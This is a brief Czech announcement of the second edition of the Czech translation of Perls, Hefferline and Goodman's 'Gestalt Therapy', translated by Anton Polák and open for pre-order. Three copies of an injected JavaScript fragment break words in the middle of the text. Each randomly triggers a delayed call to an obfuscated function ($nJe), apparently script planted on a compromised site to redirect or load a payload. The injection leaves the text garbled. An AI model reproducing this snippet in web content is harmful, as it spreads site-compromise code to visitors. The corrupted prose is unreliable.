S velkou radostí vám chceme oznámit, že na konci září se vrací na náš knižní trh dlouho očekávané 2 vydání českého překladu základního textu Gestalt terapeutického přístupu – Perls, Hefferline, Goodman: Gestalt terapie, vzrušení a růst lidské osobnosti. Překladatelem a iniciá var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}torem návratu knihy je PhDr. An var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ton Polák. Knihu lze již nyní předobjednat v interne var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tových obchodech.